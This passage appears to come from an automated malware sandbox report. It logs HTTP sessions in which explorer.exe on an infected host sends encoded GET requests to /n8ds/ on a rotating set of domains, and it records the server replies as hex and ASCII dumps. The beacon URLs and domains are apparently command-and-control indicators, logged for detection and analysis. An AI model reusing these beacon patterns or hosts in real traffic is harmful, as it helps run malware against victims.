Nov 25, 2021 12:57:38.250077963 CET	6441	OUT	GET /n8ds/?6ldD=4vxveAhDLD1bBBVBYGklTAgHIjczf9yiSG6BwPp//N0BMhpP0xQNoBxeqzaksixrbhTl&5jp=eZ4Pez HTTP/1.1 Host: www.helpcloud.xyz Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 25, 2021 12:57:38.265187025 CET	6442	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Nov 2021 11:57:38 GMT Content-Type: text/html Content-Length: 178 Connection: close Location: https://www.helpcloud.xyz:443/n8ds/?6ldD=4vxveAhDLD1bBBVBYGklTAgHIjczf9yiSG6BwPp//N0BMhpP0xQNoBxeqzaksixrbhTl&5jp=eZ4Pez Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.11.20	49823	172.67.164.153	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 12:57:48.440284967 CET	6443	OUT	GET /n8ds/?6ldD=n1UrTr6j/bQFz4e4Cp8BbMP0v/KiHdXZ9JkrSrs2y278xAws0T3fM8y5E13MJVyQk50j&5jp=eZ4Pez HTTP/1.1 Host: www.ozattaos.xyz Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	192.168.11.20	49824	3.64.163.50	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 12:57:53.969954967 CET	6444	OUT	GET /n8ds/?6ldD=4XwYGzmPDVH3THQXSPknmfdazTodAXDlHas2KNX7n/UXs4ghRUZWEGvkVm0hYsfSCvUh&5jp=eZ4Pez HTTP/1.1 Host: www.inklusion.online Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 25, 2021 12:57:53.981384993 CET	6444	IN	HTTP/1.1 410 Gone Server: openresty Date: Thu, 25 Nov 2021 11:57:39 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 35 30 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 35 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 69 6e 6b 6c 75 73 69 6f 6e 2e 6f 6e 6c 69 6e 65 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 39 0d 0a 20 20 3c 62 6f 64 79 3e 0a 0d 0a 33 63 0d 0a 20 20 20 20 59 6f 75 20 61 72 65 20 62 65 69 6e 67 20 72 65 64 69 72 65 63 74 65 64 20 74 6f 20 68 74 74 70 3a 2f 2f 77 77 77 2e 69 6e 6b 6c 75 73 69 6f 6e 2e 6f 6e 6c 69 6e 65 0a 0d 0a 61 0d 0a 20 20 3c 2f 62 6f 64 79 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 7<html>9 <head>50 <meta http-equiv='refresh' content='5; url=http://www.inklusion.online/' />a </head>9 <body>3c You are being redirected to http://www.inklusion.onlinea </body>8</html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
13	192.168.11.20	49825	136.143.191.204	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 12:58:04.395824909 CET	6445	OUT	GET /n8ds/?6ldD=diws0RRfDxwvVlRuoC4BJCkr8rc2YRL+Z6kcdn/HANybL0ntvNIGnh8uTRYHcPOHwusF&5jp=eZ4Pez HTTP/1.1 Host: www.unitedmetal-saudi.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 25, 2021 12:58:04.573025942 CET	6446	IN	HTTP/1.1 404 Server: ZGS Date: Thu, 25 Nov 2021 11:58:04 GMT Content-Type: text/html Content-Length: 4657 Connection: close Set-Cookie: 0cea9df7db=0f71d2b25c73f2883ce01c2fd3c97eb8; Path=/ X-XSS-Protection: 1 Set-Cookie: csrfc=7cab9245-d002-4707-a403-488c5a26dce3;path=/;priority=high Set-Cookie: _zcsr_tmp=7cab9245-d002-4707-a403-488c5a26dce3;path=/;SameSite=Strict;priority=high Pragma: no-cache Cache-Control: private,no-cache,no-store,max-age=0,must-revalidate Expires: Thu, 01 Jan 1970 00:00:00 GMT vary: accept-encoding Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 2c 20 6e 6f 61 72 63 68 69 76 65 2c 20 6e 6f 73 6e 69 70 70 65 74 22 20 2f 3e 0a 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 5a 6f 68 6f 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 77 65 62 66 6f 6e 74 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 36 30 30 22 3e 0a 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 4f 70 65 6e 20 53 61 6e 73 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 31 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 70 78 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 70 78 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 35 66 35 66 35 3b 0a 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 2e 74 6f 70 43 6f 6c 6f 72 73 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 2d 6d 6f 7a 2d 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 6c 65 66 74 2c 20 23 66 30 34 37 33 64 20 30 25 2c 20 23 66 30 34 37 33 64 20 32 35 25 2c 20 23 30 34 39 37 33 35 20 32 35 25 2c 20 23 30 34 39 37 33 35 20 35 30 25 2c 20 23 30 30 38 36 64 35 20 35 30 25 2c 20 23 30 30 38 36 64 35 20 37 35 25 2c 20 23 66 64 63 30 30 30 20 37 35 25 2c 23 66 64 63 30 30 30 20 31 30 30 25 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 2d 77 65 62 6b 69 74 2d 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 6c 65 66 74 2c 20 23 66 30 34 37 33 64 20 30 25 2c 20 23 66 30 34 37 33 64 20 32 35 25 2c 20 23 30 34 39 37 33 35 20 32 35 25 2c 20 23 30 34 39 37 33 35 20 35 30 25 2c 20 23 30 30 38 36 64 35 20 35 30 25 2c 20 23 30 30 38 36 64 35 20 37 35 25 2c 20 23 66 64 63 30 30 30 20 37 35 25 2c 23 66 64 63 30 30 30 20 31 30 30 25 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 34 35 Data Ascii: <!DOCTYPE html><html> <head> <meta name="robots" content="noindex, nofollow, noarchive, nosnippet" /> <title>Zoho</title> <link type="text/css" rel="stylesheet" href="/webfonts?family=Open+Sans:400,600"> <style> body{ font-family:"Open Sans", sans-serif; font-size:11px; margin:0px; padding:0px; background-color:#f5f5f5; } .topColors{ background: -moz-linear-gradient(left, #f0473d 0%, #f0473d 25%, #049735 25%, #049735 50%, #0086d5 50%, #0086d5 75%, #fdc000 75%,#fdc000 100%); background: -webkit-linear-gradient(left, #f0473d 0%, #f0473d 25%, #049735 25%, #049735 50%, #0086d5 50%, #0086d5 75%, #fdc000 75%,#fdc000 100%); background-size:45
Nov 25, 2021 12:58:04.573091030 CET	6448	IN	Data Raw: 32 70 78 20 61 75 74 6f 3b 68 65 69 67 68 74 3a 33 70 78 3b 0a 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 2e 6d 61 69 6e 43 6f 6e 74 61 69 6e 65 72 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 30 70 78 3b Data Ascii: 2px auto;height:3px; } .mainContainer{ width:1000px; margin:0px auto; } .logo{ margin-top:3px; padding:18px 0px; } .content{ back
Nov 25, 2021 12:58:04.573141098 CET	6449	IN	Data Raw: 2d 77 65 69 67 68 74 3a 34 30 30 3b 20 0a 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 2e 64 6f 6d 61 69 6e 2d 63 6f 6c 6f 72 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 23 30 30 38 36 44 35 3b 20 0a 20 20 20 20 Data Ascii: -weight:400; } .domain-color{ color:#0086D5; } .main-info{ margin-top: 40px; } .main-info li { font-size: 16px; padding: 10px 0;
Nov 25, 2021 12:58:04.573188066 CET	6450	IN	Data Raw: 6f 72 73 22 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 43 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 3c 69 6d 67 20 73 72 63 3d Data Ascii: ors"></div> <div class="mainContainer"> <div class="logo"><img src="https://contacts.zoho.com/static/file?t=org&ID=456089&fs=thumb" alt="Zoho"></div> <div class="content"> <div class="textArea">

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
14	192.168.11.20	49826	3.64.163.50	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 12:58:24.837934971 CET	6452	OUT	GET /n8ds/?6ldD=4XwYGzmPDVH3THQXSPknmfdazTodAXDlHas2KNX7n/UXs4ghRUZWEGvkVm0hYsfSCvUh&v6Mt=3fxxA4Z HTTP/1.1 Host: www.inklusion.online Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 25, 2021 12:58:24.849364996 CET	6452	IN	HTTP/1.1 410 Gone Server: openresty Date: Thu, 25 Nov 2021 11:58:24 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 35 30 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 35 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 69 6e 6b 6c 75 73 69 6f 6e 2e 6f 6e 6c 69 6e 65 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 39 0d 0a 20 20 3c 62 6f 64 79 3e 0a 0d 0a 33 63 0d 0a 20 20 20 20 59 6f 75 20 61 72 65 20 62 65 69 6e 67 20 72 65 64 69 72 65 63 74 65 64 20 74 6f 20 68 74 74 70 3a 2f 2f 77 77 77 2e 69 6e 6b 6c 75 73 69 6f 6e 2e 6f 6e 6c 69 6e 65 0a 0d 0a 61 0d 0a 20 20 3c 2f 62 6f 64 79 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 7<html>9 <head>50 <meta http-equiv='refresh' content='5; url=http://www.inklusion.online/' />a </head>9 <body>3c You are being redirected to http://www.inklusion.onlinea </body>8</html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
15	192.168.11.20	49827	203.170.80.250	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 12:58:40.925452948 CET	6454	OUT	GET /n8ds/?6ldD=hTCtvfJBK6Lgcsnz9iNzW/om0skZHj2xUOZ9QRyIykKuA9BOdz3qmP8oX5t0meM3+FVL&v6Mt=3fxxA4Z HTTP/1.1 Host: www.mackthetruck.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
16	192.168.11.20	49828	192.0.78.25	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 12:59:21.091321945 CET	6458	OUT	GET /n8ds/?2dfPiT=o6P8yX&6ldD=xlQ0Win+OWEEdOu7BqbL/FEFl5i/i6MXL9UXMpB5xFgkztpNPhPNR2/8wQo9B3jWcPv9 HTTP/1.1 Host: www.divorcefearfreedom.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 25, 2021 12:59:21.100280046 CET	6458	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Thu, 25 Nov 2021 11:59:21 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://www.divorcefearfreedom.com/n8ds/?2dfPiT=o6P8yX&6ldD=xlQ0Win+OWEEdOu7BqbL/FEFl5i/i6MXL9UXMpB5xFgkztpNPhPNR2/8wQo9B3jWcPv9 X-ac: 2.hhn _dca Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
17	192.168.11.20	49829	198.185.159.144	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 12:59:26.543008089 CET	6460	OUT	GET /n8ds/?6ldD=BkWPMdYTTR0ZQmtbwmm8ayu+d1W65DpSRIKYH6pwPIESNdIBtEF9Jb3WD/+idhQ1krue&2dfPiT=o6P8yX HTTP/1.1 Host: www.jamiecongedo.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 25, 2021 12:59:26.648669958 CET	6461	IN	HTTP/1.1 400 Bad Request Cache-Control: no-cache, must-revalidate Content-Length: 77564 Content-Type: text/html; charset=UTF-8 Date: Thu, 25 Nov 2021 11:59:26 UTC Expires: Thu, 01 Jan 1970 00:00:00 UTC Pragma: no-cache Server: Squarespace X-Contextid: 4zgLEe1M/5T4GrCAz Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 31 31 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 3b 0a 20 20 20 20 Data Ascii: <!DOCTYPE html><head> <title>400 Bad Request</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 300; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 300; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Clarkson", sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em; } footer span { margin: 0 11px; font-size: 1em;
Nov 25, 2021 12:59:26.648755074 CET	6462	IN	Data Raw: 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 61 39 61 39 61 39 3b 0a 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 6e 6f 77 72 61 70 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 Data Ascii: font-weight: 300; color: #a9a9a9; white-space: nowrap; } footer span strong { font-weight: 300; color: #191919; } @media (max-width: 600px) { body { font-size: 10px; } } @font-face { font-family
Nov 25, 2021 12:59:26.648819923 CET	6464	IN	Data Raw: 5a 63 36 54 67 4b 77 31 43 5a 4c 45 58 79 47 5a 76 49 55 6a 4a 54 46 4c 57 58 69 45 6a 6b 6a 50 2f 45 62 4e 73 72 37 4a 58 55 39 6b 62 54 57 76 76 4e 49 74 64 68 59 66 30 56 70 6a 56 43 35 78 36 41 57 48 30 43 6f 70 4a 39 6b 4c 4c 32 46 4d 6f 34 Data Ascii: Zc6TgKw1CZLEXyGZvIUjJTFLWXiEjkjP/EbNsr7JXU9kbTWvvNItdhYf0VpjVC5x6AWH0CopJ9kLL2FMo41uoZFFIwX0vyHuEjHYH2VmrxOkqFo0adgxDecFou4ep9oyEd/DYGc3ZB+z+7LZeRzLqapLukxRFwknNZLe1mD3UUryptN0i8agj3nXEkMT3jM6TFgFmSPui9ANP5tgumW+7GL2HT49v6T21zEFSmU/PyRmlIHkbMt
Nov 25, 2021 12:59:26.648866892 CET	6464	IN	Data Raw: 41 62 54 6a 45 6d 75 66 55 51 6f 51 67 41 37 52 69 72 39 61 39 68 5a 78 71 47 69 48 63 52 46 7a 33 71 43 59 53 35 6f 69 36 56 6e 58 56 63 2b 31 6a 6f 48 35 33 57 4c 6c 77 6a 39 5a 58 78 72 33 37 75 63 66 65 38 35 4b 59 62 53 5a 45 6e 4e 50 71 75 Data Ascii: AbTjEmufUQoQgA7Rir9a9hZxqGiHcRFz3qCYS5oi6VnXVc+1joH53WLlwj9ZXxr37ucfe85KYbSZEnNPquYQLdZGuGjum67O6vs4pznNN15fYXFdOLuLWXrsKEmCQSfZo21npOsch0vJ4uwm8gxs1rVFd7xXNcYLdHOA8u6Q+yN/ryi71Hun8adEPitdau1oRoJdRdmo7vWKu+0nK470m8D6uPnOKeCe7xMpwlB3s5Szbpd7HP+
Nov 25, 2021 12:59:26.648927927 CET	6465	IN	Data Raw: 64 57 72 56 38 34 7a 76 71 7a 55 70 39 38 37 66 66 4f 71 71 2b 70 6a 34 6c 4d 59 63 71 2b 5a 58 75 5a 73 78 54 49 4d 35 5a 7a 6e 4f 75 49 56 7a 61 6e 45 38 43 58 6a 4f 52 4a 38 38 35 36 67 57 65 63 49 73 37 33 47 34 49 56 61 54 6f 6d 2b 46 64 5a Data Ascii: dWrV84zvqzUp987ffOqq+pj4lMYcq+ZXuZsxTIM5ZznOuIVzanE8CXjORJ8856gWecIs73G4IVaTom+FdZmk13iQhZpVvwWaeJJvZwmZfgLrMEPDsmWSeTP2pgBIVqr44ljnDOc42NDfmKJscRnzjslLu8YD7DeUiQta8q+gTM8UuJgxqs1ltlxGmF3mHRe8w7M6YKbpYWBIZw6abAXoINXCHv8WIYdhau8bWC2V991qxUKLIeS
Nov 25, 2021 12:59:26.648988008 CET	6466	IN	Data Raw: 73 55 74 73 78 4c 45 35 68 38 53 70 70 4e 4d 66 78 35 69 6a 57 48 70 62 33 6d 5a 31 45 36 68 46 5a 43 4f 74 4a 6d 38 39 4a 38 42 6e 78 37 48 39 43 4d 66 7a 59 41 58 4d 37 66 6d 78 47 73 68 77 4c 6a 56 68 6f 78 30 49 4c 46 71 72 77 35 2b 64 6f 7a Data Ascii: sUtsxLE5h8SppNMfx5ijWHpb3mZ1E6hFZCOtJm89J8Bnx7H9CMfzYAXM7fmxGshwLjVhox0ILFqrw5+doz1Kt5lGsvahyjMuRVHINKIASaMX6Aaz/zP39dVJaibMTznE8XEmMq8H7zHPYm8ZeF/aKMDTB0O12KY6trbCV4ekxPC26HLAH2M1LTSQ0hyP1ROTBMgNLCwxVMHS4fHg2e2RNqvGnJI340EzbSTZWms3Y345WE1qeFI
Nov 25, 2021 12:59:26.649049997 CET	6468	IN	Data Raw: 6a 66 69 63 35 33 53 6e 75 34 72 53 74 2b 48 74 59 6a 2b 4a 76 41 47 4a 49 64 55 67 7a 75 6b 70 63 44 65 4a 72 47 31 62 6d 34 57 73 62 6c 75 59 78 4f 77 31 62 47 7a 77 4c 30 44 74 4c 41 71 42 6c 41 74 30 35 36 4c 61 6a 65 7a 71 36 48 72 5a 50 77 Data Ascii: jfic53Snu4rSt+HtYj+JvAGJIdUgzukpcDeJrG1bm4WsbluYxOw1bGzwL0DtLAqBlAt056Lajezq6HrZPw/M09kfgGcfzBOwryRaVDs6DJQcm6Z8PXsbsd4goAUYk4XLU6HLUiC2fVyfFCeYUc9OUuGlK7uaNENPDxPKgKHrPYD2KRgA0Jz1pdYiVah3ihI8SsbuZ7Qut7FtdT28OepdJALQ9kcuIqJaIlksKpGWQaBJEs5Ro2u
Nov 25, 2021 12:59:26.649115086 CET	6469	IN	Data Raw: 49 73 56 6e 48 51 76 47 66 48 4a 59 2b 47 73 46 4f 76 65 49 61 4c 6b 5a 54 6f 6d 2b 43 35 70 6e 6e 30 5a 74 5a 4f 73 63 53 62 64 54 51 5a 49 5a 49 6a 7a 4e 47 71 33 6a 5a 65 59 56 58 71 62 44 42 4b 37 7a 4f 50 76 37 4e 6d 78 7a 6d 4d 43 6f 36 79 Data Ascii: IsVnHQvGfHJY+GsFOveIaLkZTom+C5pnn0ZtZOscSbdTQZIZIjzNGq3jZeYVXqbDBK7zOPv7NmxzmMCo6yxGOpqJLxQEPP8ebkh2xjxPso8Vpyed4bWtGDod5nbfYx2tE9IjIcwqDOQxCLgjqhrjJapxQj5aykZ/KjJyp8vYw2jOkioWHg6QaitbobouivfRYdGlwB0//RiIvIqLJ/al9rsfi5oavS3VijivkmceYKJ2jlOzsy3
Nov 25, 2021 12:59:26.649175882 CET	6471	IN	Data Raw: 62 61 4b 64 68 59 6b 30 71 76 4f 51 56 49 71 79 6b 70 38 72 73 6c 57 4b 4b 62 77 45 6d 55 72 39 49 52 64 38 6c 67 73 49 66 2b 75 77 66 68 39 72 73 6a 2f 2f 30 34 7a 38 50 49 39 68 69 6d 33 61 35 51 30 68 41 67 43 76 57 73 45 6c 37 48 4c 47 6b 53 Data Ascii: baKdhYk0qvOQVIqykp8rslWKKbwEmUr9IRd8lgsIf+uwfh9rsj//04z8PI9him3a5Q0hAgCvWsEl7HLGkSm8xy74a7RIq2RyhLLq4vENxWg6Z8OdDn9k/pO8nvZ82B9HQH4suep5bgnoW/t4r+OSsr3KDZZ7hjnjRmpSwWGJ1Rz24Sgbupfrusw+nYg9brZp6vKv2bXV9yNo3FwRf1UmbhULadGRmefHVN7jCO1g05Yzd4bBIOY
